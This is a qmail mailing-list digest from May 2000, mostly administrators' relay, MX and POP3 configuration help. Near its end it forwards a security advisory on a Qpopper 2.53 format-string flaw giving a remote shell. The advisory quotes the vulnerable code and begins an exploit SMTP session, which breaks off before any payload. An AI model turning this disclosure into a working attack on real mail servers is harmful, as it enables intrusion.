qmail Digest 25 May 2000 10:00:01 -0000 Issue 1012
Topics (messages 42260 through 42324):
Re: Meaning of (#4.4.1) in error message
42260 by: Curtis Generous
How to set up Qmail as a front-end (relaying) server?
42261 by: Ali Sahin
42262 by: Greg Owen
42266 by: Ali Sahin
42270 by: Greg Owen
42272 by: Ali Sahin
42273 by: Chris Johnson
42274 by: Ali Sahin
42275 by: Petr Novotny
42276 by: Chris Johnson
42277 by: Greg Owen
42278 by: Ali Sahin
42279 by: Greg Owen
42281 by: Greg Owen
42282 by: Chris Johnson
42285 by: Greg Owen
42287 by: Ali Sahin
Mail clients and Maildir format
42263 by: "Pr�spero, Esteban"
42264 by: Chris Johnson
42267 by: "Pr�spero, Esteban"
42269 by: Anton Pirnat
42289 by: Erwin Hoffmann
qmail-pop3d under supervise
42265 by: "Pr�spero, Esteban"
42268 by: Petr Novotny
Re: More on Qmail DSN.
42271 by: Markus Stumpf
Re: 553, version 0
42280 by: Uwe Ohse
How to set 2 qmail servers in the same domain
42283 by: Origoni, Maurizio
42284 by: Petr Novotny
R: How to set 2 qmail servers in the same domain
42286 by: Origoni, Maurizio
URGENT: forward and relay.....
42288 by: Christian Klippel
Qmail and solaris 7
42290 by: Ramy M. Hassan
qmail & pop-3 w/mbox format
42291 by: Mikhail Kuzminsky
42292 by: Peter van Dijk
templet user
42293 by: Walid Kassab
42294 by: Christian Wiese
42299 by: Mark Johnston
42305 by: Peter Cavender
Qpopper 2.53 remote problem, user can gain gid=mail (fwd)
42295 by: John Gonzalez/netMDC admin
42296 by: Scott D. Yelich
42297 by: John Gonzalez/netMDC admin
42304 by: Russ Allbery
42323 by: listy-dyskusyjne Krzysztof Dabrowski
securing pop3 sessions
42298 by: spacetask.youwasahero.com
42300 by: Len Budney
42301 by: Adam McKenna
42303 by: Louis Theran
42308 by: spacetask.youwasahero.com
42310 by: Louis Theran
42313 by: Len Budney
42314 by: Len Budney
42315 by: Bob Rogers
42316 by: Russell Nelson
42317 by: Russ Allbery
42318 by: Patrick Berry
42319 by: llu
qvacation
42302 by: Kaare Rasmussen
Number of mailboxes per Exchange server
42306 by: Stefaan A Eeckels
Another big qmail user..
42307 by: Peter Cavender
Re: Qpopper 2.53 remote problem
42309 by: vogelke
42311 by: Adam McKenna
PINE
42312 by: Adam McKenna
forward all mail from one virtual domain to another virtual domain
42320 by: Marco Leeflang
Re: pop3
42321 by: Claus F�rber
42322 by: Alex Shipp
42324 by: Christer Matson
Administrivia:
To unsubscribe from the digest, e-mail:
[EMAIL PROTECTED]
To subscribe to the digest, e-mail:
[EMAIL PROTECTED]
To bug my human owner, e-mail:
[EMAIL PROTECTED]
To post to the list, e-mail:
[EMAIL PROTECTED]
----------------------------------------------------------------------
According to Magnus Bodin: > > On Tue, May 23, 2000 at 07:59:24PM +0100, Chris Green wrote: > > > > Secondly what does that (#4.4.1) mean? I can't find any paragraph > > number 4.4.1 in the documentation. > > > It's defined in RFC 1839 <http://rfc1839.x42.com/> Small typo above, it's actually, RFC1893 <http://rfc1893.x42.com/> > 4.X.X Persistent Transient Failure > A persistent transient failure is one in which the message as > sent is valid, but some temporary event prevents the successful > sending of the message. Sending in the future may be successful. > > X.4.X Network and Routing Status > The networking or routing codes report status about the > delivery system itself. These system components include any > necessary infrastructure such as directory and routing > services. Network issues are assumed to be under the > control of the destination or intermediate system > administrator. > > X.4.1 No answer from host > The outbound connection attempt was not answered, either > because the remote system was busy, or otherwise unable to > take a call. This is useful only as a persistent transient > error. --curtis
Hi everyone,I'm a rather newbie on Qmail. I've set it up and it seems to be working fine, with tcpwrappers. What I wanted to do is set up qmail as a front-end server. It will accept all the smtp mail in the name of another server (which is behind a firewall). I think this is about /etc/tcp.smtp and control/smtproutes files. I've set them as following;/etc/tcp.smtp----127.:allow,RELAYCLIENT=""----Although I don't know much about this file's syntax, it didn't seem enough to me.control/smtproutes----mycompany.com:10.21.200.200my2ndcomp.com:10.21.200.201----other control files include necessary information about mycompany.com and my2ndcomp.com;I'll be appreciated if someone can tell me what's wrong or what do I need to do this.Thanks in advance,Ali Sahin
> It will accept all the smtp mail in the name of another > server (which is behind a firewall). I think this is about > /etc/tcp.smtp and control/smtproutes files. I've set them > as following; > > /etc/tcp.smtp > ---- > 127.:allow,RELAYCLIENT="" For those hosts which are allowed to use this machine as an outbound relay, add them to this file. Based on what you say below, it looks like you have two internal mail servers, so you add these two lines: 10.21.200.200:allow,RELAYCLIENT="" 10.21.200.201:allow,RELAYCLIENT="" There is documentation for this format at http://cr.yp.to/ucspi-tcp/tcprules.html. Once you've modified the file, run tcprules like this: tcprules /etc/tcp.smtp.cdb /tmp/tcp.smtp.tmp < /etc/tcp.smtp And then just make sure your tcpserver invocation of qmail-smtpd has '-x /etc/tcp.smtp.cdb' in it. You say tcpwrappers above, and I'm giving instructions for tcpserver which is part of ucspi. If you meant tcpserver/ucspi, then this is okay; if not, you'll need to find the right way to do the equivalent with tcpwrappers. All you're doing is setting the RELAYCLIENT environment variable for the invocation of each qmail-smtpd process. And if you're using tcpwrappers, you don't care about tcp.smtp but rather hosts.allow. > control/smtproutes > ---- > mycompany.com:10.21.200.200 > my2ndcomp.com:10.21.200.201 > ---- You'll probably want to quote those domain literals, like such: mycompany.com:[10.21.200.200] I'm not completely sure that's necessary, but I think it is. -- gowen -- Greg Owen -- [EMAIL PROTECTED]
> > 127.:allow,RELAYCLIENT="" > > For those hosts which are allowed to use this machine > as an outbound -------- Actually, here Qmail is supposed to be an inbound relay. The servers behind the firewall sends out smtps directly. So in this case too, will the tcp.smtp be like below you said? > relay, add them to this file. Based on what you say below, it looks like > you have two internal mail servers, so you add these two lines: > > 10.21.200.200:allow,RELAYCLIENT="" > 10.21.200.201:allow,RELAYCLIENT="" > > There is documentation for this format at > http://cr.yp.to/ucspi-tcp/tcprules.html. Once you've modified the file, run tcprules like this: > > tcprules /etc/tcp.smtp.cdb /tmp/tcp.smtp.tmp < /etc/tcp.smtp > > And then just make sure your tcpserver invocation of qmail-smtpd has > '-x /etc/tcp.smtp.cdb' in it. -------- These are ok. It's in the invocation line. > > You say tcpwrappers above, and I'm giving instructions for tcpserver > which is part of ucspi. If you meant tcpserver/ucspi, then this is okay; if -------- Right. I'm using ucspi wrappers. > not, you'll need to find the right way to do the equivalent with > tcpwrappers. All you're doing is setting the RELAYCLIENT environment > variable for the invocation of each qmail-smtpd process. And if you're > using tcpwrappers, you don't care about tcp.smtp but rather hosts.allow. > > > control/smtproutes > > ---- > > mycompany.com:10.21.200.200 > > my2ndcomp.com:10.21.200.201 > > ---- > > You'll probably want to quote those domain literals, like such: > > mycompany.com:[10.21.200.200] > > I'm not completely sure that's necessary, but I think it is. -------- I thought the same way before too, but I've this notation in another server's file. And afterall, according to log files, it does connect to that server without specifying []s. -Ali
> Actually, here Qmail is supposed to be an inbound relay. The > servers behind the firewall sends out smtps directly. So in > this case too, will the tcp.smtp be like below you said? No - if you're only relaying inbound, then you don't need to modify tcp.smtp at all. That file only affects mail to domains not listed in rcpthosts (and we presume you have mydomain.com and my2ndcomp.com in rcpthosts and smtproutes). > I thought the same way before too, but I've this notation in another > server's file. And afterall, according to log files, it does > connect to that server without specifying []s. In that case you should be all set. Are you experiencing problems with this working, or were you just getting a sanity check on your configuration? If you are experiencing problems, what problems do you have? Is there any log activity associated with the attempts? And if you're experiencing problems, please let us know the real domain names involved and the hostname for the relay so we can check your DNS setup. -- gowen -- Greg Owen -- [EMAIL PROTECTED]
From: mark [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, May 24, 2000 4:59 PM
To: Ali Sahin
Subject: Re: How to set up Qmail as a front-end (relaying) server?In other words you would like to setup a mail exchanger?(PS - I'm fairly new to qmail to)In tcp.smtp of the MX you should have the ip ranges that are allowed to use that server. For example I have a enrty 192.102.9.:allow,RELAYCLIENT=""This allows all users on that network to use my MX.Next is to add that domain into rcpthosts. This means that the server will now accept mail for that domain.Then assuming that you dont have rewrites or virtual domains you need to enter in a smtproute for that domain. "my.domain.com:[ip number of host]"Restart qmail-send "kill -HUP ps number of qmail-send"Next would be to add a MX record in your primary DNS server for that host.Restart the DNS.I hope that helps,If you are unclear or next extra help just give me a ring.Best of LuckMark
On Wed, May 24, 2000 at 05:11:13PM +0300, Ali Sahin wrote: > Actually I need to setup Qmail only as an inbound server. And tcp.smtp lines' > purpose seems to specify from which hosts Qmail is to accept relaying smtp > queries. But in my case, there is no such relaying. I want it to accept all > smtp connections from all over the world (of course only if destined to > [EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]> or [EMAIL PROTECTED] > <mailto:[EMAIL PROTECTED]> ) and pass them (as is) to either 10.21.200.200 or > 10.21.200.201 according to the host of which the email is sent. You don't need to use tcp.smtp or -x with tcpserver at all. Just stick mycomany.com and my2ndcomp.com in control/rcpthosts, and put: mycomany.com:10.21.200.200 my2ndcomp.com:10.21.200.201 in control/smtproutes. That should be all you have to do. Chris
> In that case you should be all set. Are you experiencing problems > with this working, or were you just getting a sanity check on your > configuration? ------- Yeah, when I try to send an email to a user (which has a mailbox on the internal server but does not have one on the Qmail) qmail refuses to pass that mail to my internal server. It's going to be a real hard work for me to do if Qmail requires me to open a mailbox for every user on the internal server even though the mere thing it will do is to forward the messages.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 24 May 00, at 17:15, Ali Sahin wrote: > Yeah, when I try to send an email to a user (which has a mailbox on > the internal server but does not have one on the Qmail) qmail refuses > to pass that mail to my internal server. Take that domain out of locals and/or virtualdomains and keep it _only_ in smtproutes and rcpthosts. -----BEGIN PGP SIGNATURE----- Version: PGP 6.0.2 -- QDPGP 2.60 Comment: http://community.wow.net/grt/qdpgp.html iQA/AwUBOSvWhlMwP8g7qbw/EQK7WACeMnUeiZeiDK1INgHNQMcgN1EHrywAoOhJ 7l6ZNw3UPqKCzShFMYfpjK7O =wFFi -----END PGP SIGNATURE----- -- Petr Novotny, ANTEK CS [EMAIL PROTECTED] http://www.antek.cz PGP key ID: 0x3BA9BC3F -- Don't you know there ain't no devil there's just God when he's drunk. [Tom Waits]
On Wed, May 24, 2000 at 05:15:50PM +0300, Ali Sahin wrote: > > In that case you should be all set. Are you experiencing problems > > with this working, or were you just getting a sanity check on your > > configuration? > ------- > Yeah, when I try to send an email to a user (which has a mailbox on the > internal server but does not have one on the Qmail) qmail refuses to pass > that mail to my internal server. It's going to be a real hard work for me to > do if Qmail requires me to open a mailbox for every user on the internal > server even though the mere thing it will do is to forward the messages. I'd like to see evidence of that. If your domains aren't listed in control/locals or control/virtualdomains (and they shouldn't be), then whether there's a mailbox on the qmail relay for the user name in question is irrelevant. If they are listed in control/locals or control/virtualdomains, then nothing will be relayed to your internal server. What does "qmail refuses to pass that mail to my internal server" mean, exactly? Chris
> Yeah, when I try to send an email to a user (which has a > mailbox on the internal server but does not have one on > the Qmail) qmail refuses to pass that mail to my internal > server. You know, if we knew what error messages or log messages accompany this "refusal," we'd probably be able to help you. But until then, we're all shooting in the dark. > It's going to be a real hard work for me to do if Qmail > requires me to open a mailbox for every user on the internal > server even though the mere thing it will do is to forward > the messages. It doesn't require that. Your configuration is broken. But you've provided absolutely minimal information about your config, and absolutely nothing from your logs, so we can't help you yet. -- gowen -- Greg Owen -- [EMAIL PROTECTED]
Ok, here's my setup; control/smtproutes --- mycompany.com:10.21.200.200 my2ndcomp.com:10.21.200.201 --- control/rcpthosts --- mycompany.com my2ndcomp.com --- control/me --- mx1.mycompany.com --- and, here's a sample log of what happens; I've opened a telnet session to Qmail, and sent two messages. One to [EMAIL PROTECTED] and the other to [EMAIL PROTECTED] Both has mailboxes on the internal server. But only asahin has a mailbox on Qmail. What I want is to forward both asahin and qmailtest messages to internal server. [EMAIL PROTECTED] seems to work, but not the way I want. And the other doesn't work at all. ---- new msg 128847 info msg 128847: bytes 1350 from <#@[]> qp 2935 uid 502 starting delivery 841: msg 128847 to local [EMAIL PROTECTED] status: local 2/10 remote 0/20 delivery 840: success: did_0+1+0/qp_2935/ status: local 1/10 remote 0/20 end msg 128846 delivery 841: success: did_1+0+0/ status: local 0/10 remote 0/20 end msg 128847 new msg 128846 info msg 128846: bytes 196 from <[EMAIL PROTECTED]> qp 2949 uid 503 starting delivery 842: msg 128846 to local [EMAIL PROTECTED] status: local 1/10 remote 0/20 delivery 842: failure: Sorry,_no_mailbox_here_by_that_name._(#5.1.1)/ status: local 0/10 remote 0/20 bounce msg 128846 qp 2952 end msg 128846 -----Original Message----- From: 'Chris Johnson' [mailto:[EMAIL PROTECTED]] Sent: Wednesday, May 24, 2000 5:20 PM To: Ali Sahin Subject: Re: How to set up Qmail as a front-end (relaying) server? On Wed, May 24, 2000 at 05:18:07PM +0300, Ali Sahin wrote: > > You don't need to use tcp.smtp or -x with tcpserver at all. Just stick > > mycomany.com and my2ndcomp.com in control/rcpthosts, and put: > > > > mycomany.com:10.21.200.200 > > my2ndcomp.com:10.21.200.201 > > > > in control/smtproutes. > ------ > That's what I've done Chris, but Qmail rejects to forward the messages that > it doesn't have a mailbox for. That simply will not happen. There are details of your setup that you're not telling us. Chris
> Ok, here's my setup; ... > control/smtproutes > control/rcpthosts > control/me What's in control/locals? > info msg 128846: bytes 196 from <[EMAIL PROTECTED]> qp 2949 uid 503 > starting delivery 842: msg 128846 to local [EMAIL PROTECTED] > status: local 1/10 remote 0/20 > delivery 842: failure: Sorry,_no_mailbox_here_by_that_name._(#5.1.1)/ This message indicates that the mail relay thinks that it accepts mail for ihlas.com.tr (presumably that's either mycompany.com or my2ndcomp.com) locally, and it doesn't even look at smtproutes. -- gowen -- Greg Owen -- [EMAIL PROTECTED]
> This message indicates that the mail relay thinks that > it accepts mail for ihlas.com.tr (presumably that's either > mycompany.com or my2ndcomp.com) locally, and it doesn't even > look at smtproutes. Sorry, brain outsped fingers; I meant: This message indicates that the mail relay thinks that it accepts mail for mycompany.com locally, and it doesn't even look at smtproutes. -- gowen -- Greg Owen -- [EMAIL PROTECTED]
On Wed, May 24, 2000 at 05:32:23PM +0300, Ali Sahin wrote: > control/smtproutes > --- > mycompany.com:10.21.200.200 > my2ndcomp.com:10.21.200.201 > --- > > control/rcpthosts > --- > mycompany.com > my2ndcomp.com > --- > > control/me > --- > mx1.mycompany.com > --- Okay, first of all, WHAT ARE YOUR REAL DOMAIN NAMES? Fake domain names make people on this list *insane*. It may not make a difference in this case, but it frequently does make a difference, and the person posting the question often doesn't realize this. Second, what's in control/locals? Please don't keep any more secrets from us. This is the 12th message in this thread; if you'd provided all the information right away, there would have been only two messages, yours and the answer. Chris > > and, here's a sample log of what happens; > I've opened a telnet session to Qmail, and sent two messages. One to > [EMAIL PROTECTED] and the other to [EMAIL PROTECTED] Both has > mailboxes on the internal server. But only asahin has a mailbox on Qmail. > What I want is to forward both asahin and qmailtest messages to internal > server. [EMAIL PROTECTED] seems to work, but not the way I want. And the > other doesn't work at all. > > > ---- > > new msg 128847 > info msg 128847: bytes 1350 from <#@[]> qp 2935 uid 502 > starting delivery 841: msg 128847 to local [EMAIL PROTECTED] > status: local 2/10 remote 0/20 > delivery 840: success: did_0+1+0/qp_2935/ > status: local 1/10 remote 0/20 > end msg 128846 > delivery 841: success: did_1+0+0/ > status: local 0/10 remote 0/20 > end msg 128847 > new msg 128846 > info msg 128846: bytes 196 from <[EMAIL PROTECTED]> qp 2949 uid 503 > starting delivery 842: msg 128846 to local [EMAIL PROTECTED] > status: local 1/10 remote 0/20 > delivery 842: failure: Sorry,_no_mailbox_here_by_that_name._(#5.1.1)/ > status: local 0/10 remote 0/20 > bounce msg 128846 qp 2952 > end msg 128846 >
> > > Ok, here's my setup; > > ... > > > control/smtproutes > > > control/rcpthosts > > > control/me > > > > What's in control/locals? > controls/locals > ---- > mx1.mycompany.com > mycompany.com > mx1.mycompany.com > ---- There's your problem. Remove mycompany.com from locals, because it isn't local. -- gowen -- Greg Owen -- [EMAIL PROTECTED]
> Okay, first of all, WHAT ARE YOUR REAL DOMAIN NAMES? Fake > domain names make > people on this list *insane*. It may not make a difference in > this case, but it > frequently does make a difference, and the person posting the > question often > doesn't realize this. ---- Why I didn't give the real host name is because there is another machine serving for that host name, (thus I'm sending you messages as [EMAIL PROTECTED]). I'ts NOT that I hesitated to specify it in here. mycompany.com=ihlas.com.tr But if I were to specify this so, things would be much more complicated because there is a _working_ ihlas.com.tr SMTP server in real world and it's different that the new one I'm trying to set up. > > Second, what's in control/locals? > > Please don't keep any more secrets from us. This is the 12th > message in this > thread; if you'd provided all the information right away, > there would have been > only two messages, yours and the answer. > > Chris
Does anybody know if mail clients like Netscape Communicator or MS Outlook support the Maildir format? I haven't found out how... Thanks in advance! Esteban Javier Pr�spero
On Wed, May 24, 2000 at 10:43:40AM -0300, "Pr�spero, Esteban" wrote: > Does anybody know if mail clients like Netscape Communicator or MS Outlook > support the Maildir format? I haven't found out how... Communicator and Outlook communicate with your server via POP3, and don't know or care what kind of storage you use. As long as your POP3 daemon supports Maildir (and qmail-pop3d does), any POP3 client will work. Chris
Thanks!! so please take a look at my second question! Esteban -----Original Message----- From: Chris Johnson [SMTP:[EMAIL PROTECTED]] Sent: Wednesday, May 24, 2000 10:45 AM To: Pr�spero, Esteban" Cc: '[EMAIL PROTECTED]' Subject: Re: Mail clients and Maildir format On Wed, May 24, 2000 at 10:43:40AM -0300, "Pr�spero, Esteban" wrote: > Does anybody know if mail clients like Netscape Communicator or MS Outlook > support the Maildir format? I haven't found out how... Communicator and Outlook communicate with your server via POP3, and don't know or care what kind of storage you use. As long as your POP3 daemon supports Maildir (and qmail-pop3d does), any POP3 client will work. Chris
Hello, i guess there are (at least) two answers with both same result, but one is funnier.. 1.) Netscape Communicator and MS Outlok boes do support Maildir format.. 2.) It (should) does no matter what client (MUA, mail user agent) your�e using, they all are �knocking� on the mail-servers door to ask for its mail if there is any. As far i know, if a mail client accesses this directories directly (like some unix clients do if youre on the same network) so this may cause problems. a.) am i under 10 typos per line (including this one) now? b.) am i right? c.) is there any life before breakfast? Regards from Stuttgart, Germany (not Arkansas nor Kansas) Anton Pirnat >>>>>>>>>>>>>>>>>> Urspr�ngliche Nachricht <<<<<<<<<<<<<<<<<< Am 24.05.00, 14:43:40, schrieb "Pr�spero, Esteban" <[EMAIL PROTECTED]> zum Thema Mail clients and Maildir format: > Does anybody know if mail clients like Netscape Communicator or MS Outlook > support the Maildir format? I haven't found out how... > Thanks in advance! > Esteban Javier Pr�spero
Hi, you may have a look on my remarks about SUSE Linux and QMAIL: http://www.fehcom.de/qmail_en.html cheers. eh. At 14:46 24.5.2000 GMT, Anton Pirnat wrote: >Hello, > >i guess there are (at least) two answers with both same result, but >one is funnier.. > >1.) Netscape Communicator and MS Outlok boes do support Maildir >format.. > >2.) It (should) does no matter what client (MUA, mail user agent) >your�e using, they all are �knocking� on the mail-servers door to ask >for its mail if there is any. As far i know, if a mail client accesses >this directories directly (like some unix clients do if youre on the >same network) so this may cause problems. > > >a.) am i under 10 typos per line (including this one) now? >b.) am i right? >c.) is there any life before breakfast? > > >Regards from Stuttgart, Germany (not Arkansas nor Kansas) > >Anton Pirnat > > > >>>>>>>>>>>>>>>>>>> Urspr�ngliche Nachricht <<<<<<<<<<<<<<<<<< > >Am 24.05.00, 14:43:40, schrieb "Pr�spero, Esteban" ><[EMAIL PROTECTED]> zum Thema Mail clients and Maildir format: > > >> Does anybody know if mail clients like Netscape Communicator or MS >Outlook >> support the Maildir format? I haven't found out how... > >> Thanks in advance! >> Esteban Javier Pr�spero > > > > +-----------------------------------------------------------------------+ | fff hh http://www.fehcom.de Dr. Erwin Hoffmann | | ff hh | | ff eee hhhh ccc ooo mm mm mm Wiener Weg 8 | | fff ee ee hh hh cc oo oo mmm mm mm 50858 Koeln | | ff ee eee hh hh cc oo oo mm mm mm | | ff eee hh hh cc oo oo mm mm mm Tel 0221 484 4923 | | ff eeee hh hh ccc ooo mm mm mm Fax 0221 484 4924 | +-----------------------------------------------------------------------+
Hello! I've installed qmail+tcpserver+supervise in my Solaris 2.6 environment and now I want to get the pop3 server up and running. I kept up with Life with qmail, but it does not specifiy how to set up the pop3 server under supervise. How do I run a supervised version of qmail-pop3d? Does it work as qmail-smtpd (for the supervise view)? Which run control scripts should I edit? Thanks in advance!! Esteban Javier Pr�spero
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 24 May 00, at 10:47, Próspero, Esteban wrote: > Hello! > I've installed qmail+tcpserver+supervise in my Solaris 2.6 environment > and now I want to get the pop3 server up and running. I kept up with > Life with qmail, but it does not specifiy how to set up the pop3 > server under supervise. It seems you're right. Dave? > How do I run a supervised version of > qmail-pop3d? Does it work as qmail-smtpd (for the supervise view)? Yes. > Which run control scripts should I edit? On my installation, I have created a new directory in /var/supervise (use any directory name you want) called qmail-pop3, I have put a "run" script in there (derived from qmail-smtpd's "run" script) and softlinked this dir into /service. I am not sure this is lwq'ish enough :-) -----BEGIN PGP SIGNATURE----- Version: PGP 6.0.2 -- QDPGP 2.60 Comment: http://community.wow.net/grt/qdpgp.html iQA/AwUBOSvRjFMwP8g7qbw/EQLnGwCfYjf18SlOtN4cFAPUzvSEB5rZnroAoLYG 7grpXeyu1p37mfzGwxH7YPAQ =hTvK -----END PGP SIGNATURE-----
On Mon, May 22, 2000 at 04:49:09PM +0000, [EMAIL PROTECTED] wrote: > ie.. in .qmail-default I'd have: > | qreceipt $RECEPIENT > > So it would work with virtual domains and Netscape's MDN. So far nothing. > I've even hacked qreceipt and still nada.. Can anyone help with idea, a > patch, anything? I dunno if this is a typo in this email, but it definitely should read "RECIPIENT" not "RECEPIENT" \Maex -- SpaceNet GmbH | http://www.Space.Net/ | Stress is when you wake Research & Development | mailto:[EMAIL PROTECTED] | up screaming and you Joseph-Dollinger-Bogen 14 | Tel: +49 (89) 32356-0 | realize you haven't D-80807 Muenchen | Fax: +49 (89) 32356-299 | fallen asleep yet.
On Wed, May 24, 2000 at 07:00:43AM +0200, clemensF wrote: > + // changed Wed-24.05.00-03:29 -ino: because fetchmail hickups when 553 > + // arrives out-of-band after recipient has been checked! > + // following line moved up from it's place in smtp_rcpt > + if (flagbarf) { err_bmf(); return; } Congratulations, your patched qmail-smtpd doesn't follow the RFC 821 anymore. RFC 821 allows to send one of the following: 421 <domain> Service not available, closing transmission channel 451 Requested action aborted: local error in processing 452 Requested action not taken: insufficient system storage 500 Syntax error, command unrecognized [This may include errors such as command line too long] 551 User not local; please try <forward-path> 552 Requested mail action aborted: exceeded storage allocation Do you really want to patch a fetchmail bug in qmail? Then try to answer 550 at "RCPT", that might work around that fetchmail bug. Regards, Uwe
Hi ! I have a qmail mail server with tcpserver and it works fine. Now I want to setup a second qmail server to use for secondary MX in my domains. How can I allign the 2 mail servers so if the first server go down the second accepts mails for my customers in automatic mode ? When the first goes up again, the second sends to it the mail received automatically ? Thanks :-))
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 24 May 00, at 15:43, Origoni, Maurizio wrote: > I have a qmail mail server with tcpserver and it works fine. Now I > want to setup a second qmail server to use for secondary MX in my > domains. How can I allign the 2 mail servers so if the first server > go down the second accepts mails for my customers in automatic mode ? > When the first goes up again, the second sends to it the mail received > automatically ? Isn't this a FAQ? On the secondary mailserver, you put the domains into rcpthosts but NOT into locals or virtualdomains. That's all. -----BEGIN PGP SIGNATURE----- Version: PGP 6.0.2 -- QDPGP 2.60 Comment: http://community.wow.net/grt/qdpgp.html iQA/AwUBOSvdW1MwP8g7qbw/EQL5GwCdEQ7DaGBGX6qnTDOpUdxjdznDh6sAnReX Y/szkD+KAyggld5he0UnAbaH =tm4y -----END PGP SIGNATURE----- -- Petr Novotny, ANTEK CS [EMAIL PROTECTED] http://www.antek.cz PGP key ID: 0x3BA9BC3F -- Don't you know there ain't no devil there's just God when he's drunk. [Tom Waits]
Thanks... So have I not to use tcpserver ? Can I start the second in inetd.conf and manage only rcphosts file ? -----Messaggio originale----- Da: Petr Novotny [mailto:[EMAIL PROTECTED]] Inviato: mercoled� 24 maggio 2000 16.47 A: Qmail List (E-mail) Oggetto: Re: How to set 2 qmail servers in the same domain -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 24 May 00, at 15:43, Origoni, Maurizio wrote: > I have a qmail mail server with tcpserver and it works fine. Now I > want to setup a second qmail server to use for secondary MX in my > domains. How can I allign the 2 mail servers so if the first server > go down the second accepts mails for my customers in automatic mode ? > When the first goes up again, the second sends to it the mail received > automatically ? Isn't this a FAQ? On the secondary mailserver, you put the domains into rcpthosts but NOT into locals or virtualdomains. That's all. -----BEGIN PGP SIGNATURE----- Version: PGP 6.0.2 -- QDPGP 2.60 Comment: http://community.wow.net/grt/qdpgp.html iQA/AwUBOSvdW1MwP8g7qbw/EQL5GwCdEQ7DaGBGX6qnTDOpUdxjdznDh6sAnReX Y/szkD+KAyggld5he0UnAbaH =tm4y -----END PGP SIGNATURE----- -- Petr Novotny, ANTEK CS [EMAIL PROTECTED] http://www.antek.cz PGP key ID: 0x3BA9BC3F -- Don't you know there ain't no devil there's just God when he's drunk. [Tom Waits]
hi, i�m a bit in trouble for now. i set up qmail and all works ok. then i use /etc/aliases with fastforward, and after that the machine acts as a relay. following situation : we are hosting serveral domains, each has for example a [EMAIL PROTECTED] etc. there is also an old mail-server using a different domain which is actually the "real" mail server where our staff get its mail from. so the new server has to do following : all mail for domain foo.com should go to bar.com mail from [EMAIL PROTECTED] should go to [EMAIL PROTECTED] mail from [EMAIL PROTECTED] should also go to me mail from [EMAIL PROTECTED] should go to [EMAIL PROTECTED] mail from [EMAIL PROTECTED] should go to [EMAIL PROTECTED] and so on.... only known rcpts should be allowed, so i put all our domains in in rcpthosts and locals smptroutes shows: real.mail:[12.34.56.78] but i can send mail to ANY host. ANYbody can do that. how to stop that ? please, please help........ it drives me nuts......
Hi ! I installed qmail successfully on a linux 2.2.x host before. Now I am trying to do the same thing on a SunOS 5.7 server. I used gcc-2.95.2 to compile qmail and followed the installation instuctions carefully and created maildirs for my users and changed /var/qmail/rc to use the maildir format. But when I come to the stage of testing the installation (as described in TEST.deliver), I can see all four daemons running using "ps -ef", but nothing appears in syslog!! and when I try "echo to: testuser | /var/qmail/bin/qmail-inject" .. nothing reach testuser !!. Any suggestions ?? Thanks in advance.
Dear netters, we are using qmail 1.03 (instead of sendmail) on SGI O2. Qmail is configured to work w/mbox format (binmail for local delivery to /var/mail/user). We want to install pop-3 (or imap) daemon on this workstation. Unfortunately qmail-pop3d opereates only w/Maildir format. Is there some other pop-3/imap daemons which can work succesfully in cooperation w/qmail ? Thanks for your help. Mikhail Kuzminsky Zelinsky Institute of Organic Chemistry Moscow
On Wed, May 24, 2000 at 08:19:13PM +0400, Mikhail Kuzminsky wrote: [snip] > Is there some other pop-3/imap daemons which can work > succesfully in cooperation w/qmail ? Sure, lots of 'm. http://freshmeat.net/appindex/daemons/pop3.html should be helpful. Greetz, Peter. -- [EMAIL PROTECTED] - Peter van Dijk [student:developer:madly in love]
Hi Walid, what do you mean with "templet user" ?
regards
Christian
Walid Kassab schrieb:
Is there a templet user for QMAIL?
Hi- I think you mean "user template". I am not sure about BSD, but in Linux, you add the stuff you want new users to have to the /etc/skel directory. The qmail utility "maildirmake" will create a maildir in a certain directory. If you tell maildirmake to create one in /var/skel ,then all new users will get a maildir. see: man maildirmake In the basic Linux install of qmail, it is located at: /var/qmail/bin/maildirmake I hope this helps... --Pete
Havent seen this forwarded to the list, and it probably applies to quite a few people. Just in case someone isnt on bugtraq. BTW, in my source (2.53) i couldnt find any lines similar to what he suggests changing, perhaps he was looking at the FBSD ported version and it has been modified slightly, i dunno.... -- _ __ _____ __ _________ ______________ /_______ ___ ____ /______ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [---------------------------------------------[system info]-----------] 1:20pm up 13 days, 18:46, 4 users, load average: 0.08, 0.22, 0.21 ---------- Forwarded message ---------- Date: Tue, 23 May 2000 09:43:33 -800 From: Prizm <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] Subject: Qpopper 2.53 remote problem, user can gain [iso-8859-1] gid=mail I have attached to this message the advisory with full details + exploit on this problem. Prizm/b0f,_____________________________________________________________________ b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 5 Advisory Name: Remote shell via Qpopper2.53 Date: 5/23/00 Application: Qpopper 2.53 for *NIX Vendor: Qualcomm Incorporated WWW: www.qualcomm.com Severity: can give users remote shell with gid=mail. Author: prizm ([EMAIL PROTECTED]) Homepage: b0f.freebsd.lublin.pl * Overview Qpopper is the most widely-used server for the POP3 protocol. This allows users to access their mail using any POP3 client. Qpopper supports the latest standards, and includes a large number of optional features. Qpopper is normally used with standard UNIX mail transfer and delivery agents such as sendmail or smail. * The Problem Yes, Qpop, again and again... There is a bug in version 2.53 of Qpop that can give you a remote shell with gid=mail. Problem is with euidl command which uses user input as format string for pop_msg() function. Lets examine following code from Qpop 2.53 source: --> pop_uidl.c, around line 150: ................ sprintf(buffer, "%d %s", msg_id, mp->uidl_str); if (nl = index(buffer, NEWLINE)) *nl = 0; sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp)); ! return (pop_msg (p,POP_SUCCESS, buffer)); ^^^^^^^^^^^^^ ................. Function pop_msg() is declared in pop_msg.c as pop_msg(POP *p, int stat, const char *format,...), and here we have user-input as format string. Lame. Ok, back to problem, imagine following smtp session: MAIL FROM:<[EMAIL PROTECTED]> 200 Ok RCPT TO:<[EMAIL PROTECTED]> 200 Ok data 200 Okey, okey. end with "." Subject: still trust 